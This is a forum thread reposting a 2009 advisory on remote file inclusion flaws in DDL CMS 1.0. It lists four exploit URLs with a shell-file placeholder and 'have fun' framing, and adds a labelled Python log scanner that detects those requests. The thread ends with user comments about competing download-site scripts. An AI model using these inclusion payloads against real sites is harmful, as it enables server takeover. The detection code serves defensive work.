DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities

Status
Not open for further replies.

tstowe

Have fun, kiddos... it was posted yesterday @ milw0rm

+============================================================+
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
+============================================================+
| Author : HxH                                               |
| E-Mail : HxH[at]live[dot]at                                |
+------------------------------------------------------------+
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
+------------------------------------------------------------+
| Exploit :                                                  |
| /header.php?wwwRoot=[Shell.txt?]                           |
| /submit.php?wwwRoot=[Shell.txt?]                           |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
+============================================================+
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
+============================================================+

# milw0rm.com [2009-09-21]
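
A defender's check for the four request patterns listed in the advisory, as an added example that is not part of the original post or of DDL CMS: it scans web server access-log lines for requests that set `wwwRoot` on the listed scripts and marks values that name a URL scheme or another host. The common/combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter name are the ones listed in the advisory.
AFFECTED_SCRIPTS = ("/header.php", "/submit.php", "/submitted.php",
                    "/autosubmitter/index.php")
PARAM = "wwwRoot"

# Request line of a common/combined log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starts with a URL scheme (http:, ftp:, php:, ...) or with //host.
EXTERNAL_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2009:10:01:02 +0000] '
    '"GET /header.php?wwwRoot=http://files.example.test/a.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Sep/2009:10:01:09 +0000] "GET /ddl/autosubmitter/index.php'
    '?x=1&wwwRoot=%68ttp%3A%2F%2Ffiles.example.test%2Fa.txt%3F HTTP/1.1" 200 498',
    '198.51.100.4 - - [22/Sep/2009:10:02:30 +0000] '
    '"GET /submit.php?wwwRoot=/var/www/ddl HTTP/1.1" 200 2048',
    '198.51.100.9 - - [22/Sep/2009:10:03:11 +0000] '
    '"GET /index.php?page=2 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [22/Sep/2009:10:03:40 +0000] '
    '"POST /submitted.php HTTP/1.1" 200 1024',
]


def classify(line):
    """Return (path, value, external) if the request sets wwwRoot on an
    affected script, otherwise None. The value is percent-decoded first."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.endswith(AFFECTED_SCRIPTS):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == PARAM:
            return target.path, value, bool(EXTERNAL_RE.match(value))
    return None


def scan(lines):
    """Collect every hit from an iterable of access-log lines."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for path, value, external in scan(SAMPLE_LOG):
        print("EXTERNAL" if external else "local   ", path, value)
```

Any request that supplies `wwwRoot` at all is worth reviewing; the external flag only sorts the hits by urgency.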
 
13 comments
Surprised it took this long to find these vulns.

I saw them the day it got released when I was bored (had a week of uni if I remember correctly).

There are a few more too, especially in the latest version, but I won't post them.
 
That is for V1... V3 is very overdue to be released.

I remember jmz saying all vulnerabilities were fixed in V2 but cba to find his post.
 
v2 still has vulnerabilities in it but I doubt anyone bothered finding them.

Paul: As far as I know, WCDDL has no vulnerabilities. It's unlike me to code something which is not secure, so there's a high chance it isn't exploitable unless some 3rd-party mod is vulnerable.
 
@ JMZ I respect your work at WCDDL, been looking closely at the way it works and I have to say some real work was put into it, and I'm really surprised that you never asked for profit.

DDLCMS on the other hand, half arsed, exploitable, copied from KDDL, looks shit, and really is a big way to get more sales at sharingzone.

Different reasons, same product, different success methinks. Besides 6-7 ddl from DDLCMS owner I don't think more than half a dozen are still out there, but they exploded when it was released.
 
Have fun, kiddos... it was posted yesterday @ milw0rm

And later in the same post. Great copy and paste job!
# milw0rm.com [2009-09-21]

Ya, there's topics here on WJ about the vulnerabilities in DDLCMS and arguments between the owner of the script and Jmz.

You've posted one for Version 1 which is really old. Version 2 had ones too, some of which were fixed. Will be interesting to see Version 3. Didn't even know there was one coming.

Some people prefer DDLCMS over WCDDL as it has a lot of basic stuff installed while WCDDL has fewer features. It's intended that way to use as a base and any good coder or webmaster would prefer WCDDL. A lot of noobs prefer DDLCMS as there's less work in setting it up as a lot of extra features are included even though it's poorly coded.
 
Mr Happy, good to see someone who fully understands the audience I'm aiming at with WCDDL.

As for exploits, I believe DDLCMS will always contain some kind of vulnerability, considering both 1.x and 2.x still contain them.

I didn't really argue with him in the past, I just pointed bad things out about his script which he responded to with a huge badly-worded post.
 
Them other vulns you mentioned JMZ (several admin vulns) I posted months ago lol in chat!

Took me like 3-4 mins to find that many, I done this


DDLCMS.zip > Recycle Bin
 